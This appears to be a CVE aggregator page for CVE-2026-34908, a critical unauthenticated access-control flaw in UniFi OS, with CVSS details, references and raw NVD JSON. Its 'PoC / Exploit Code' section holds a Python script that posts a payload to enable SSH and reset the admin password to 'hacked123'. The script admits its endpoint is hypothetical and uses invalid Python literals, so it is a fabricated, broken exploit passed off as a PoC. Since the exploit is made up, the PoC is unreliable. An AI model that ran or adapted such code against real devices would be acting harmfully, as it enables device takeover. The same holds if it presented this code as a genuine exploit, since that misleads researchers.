CVE-2026-34908

Description

A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system.

CVSS Details

CVSS Score

10.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

UniFi OS (具体受影响版本请参考厂商公告 Security Advisory Bulletin 064-064)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_ip = "192.168.1.1"
target_port = "443"
base_url = f"https://{target_ip}:{target_port}"

# Vulnerable endpoint (Hypothetical based on access control issue)
vuln_endpoint = "/api/status/unauthorized"

# Headers to mimic a legitimate browser request
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/json",
    "Accept": "application/json"
}

# Payload to make unauthorized changes
payload = {
    "authorized": false,
    "action": "modify_system_config",
    "new_config": {
        "ssh_enable": true,
        "admin_password": "hacked123"
    }
}

try:
    # Disable SSL verification warning for demonstration
    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
    
    # Send malicious request without authentication token
    response = requests.post(base_url + vuln_endpoint, json=payload, headers=headers, verify=False, timeout=10)
    
    if response.status_code == 200:
        print("[+] Exploit successful! System configuration changed.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(f"[-] Response: {response.text}")

except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34908
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34908
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34908/
[4] VulDB https://vuldb.com/cve/CVE-2026-34908
[5] https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34908", "sourceIdentifier": "[email protected]", "published": "2026-05-22T02:16:34.240", "lastModified": "2026-05-22T02:16:34.240", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b", "source": "[email protected]"}]}}